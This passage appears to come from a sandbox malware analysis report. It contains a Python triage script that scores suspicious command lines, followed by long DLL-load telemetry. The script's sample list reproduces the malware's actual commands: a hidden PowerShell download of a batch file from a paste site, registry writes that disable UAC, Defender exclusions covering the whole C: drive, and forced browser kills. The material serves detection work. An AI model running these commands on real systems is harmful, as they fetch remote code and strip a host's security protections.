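    over several distinct browsers. Score is the sum of distinct rule weights."""
    findings, details, killed = Counter(), {}, set()
    for cmd in cmdlines:
        for rule, detail in classify(cmd):
            if rule == "taskkill":
                if detail in BROWSERS:
                    killed.add(detail)
                continue
            findings[rule] += 1
            details.setdefault(rule, []).append(detail)
    if len(killed) >= kill_threshold:
        findings["browser_kill_spree"] = len(killed)
        details["browser_kill_spree"] = sorted(killed)
    score = min(100, sum(WEIGHTS[r] for r in findings))
    verdict = "malicious" if score >= 60 else "suspicious" if score >= 25 else "benign"
    return {"findings": dict(findings), "details": details, "score": score, "verdict": verdict}


# Constructed sample: command lines taken from this report, password replaced.
SAMPLE = [line.strip() for line in r"""
PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
"C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pExamplePassword
taskkill /F /IM chrome.exe
taskkill /F /IM firefox.exe
taskkill /F /IM msedge.exe
taskkill /F /IM brave.exe
taskkill /F /IM CMD.exe
timeout /t 9
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
""".strip().splitlines()]

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

          Two details worth keeping in mind when reading the output. The exclusion written as 'C:\' covers the whole system drive, so every later stage is invisible to Defender regardless of where it lands; and because PowerShell does not expand variables inside single quotes, the entry Add-MpPreference -ExclusionPath '$env:TEMP\Startup' registers the literal string rather than the user's Temp\Startup folder, which is why the classifier reports the argument exactly as it was passed instead of resolving it. The HKLM writes and the Defender exclusions both need an elevated context to succeed, so on a host where the batch ran unelevated the reg.exe and Add-MpPreference lines still appear in process telemetry but the values may be unchanged; confirm the actual registry state before treating the UAC changes as applied.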
          Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: windows.shell.servicehostbuilder.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: ieframe.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: netapi32.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: version.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: wkscli.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: mlang.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
          Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Program Files\7-Zip\7z.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
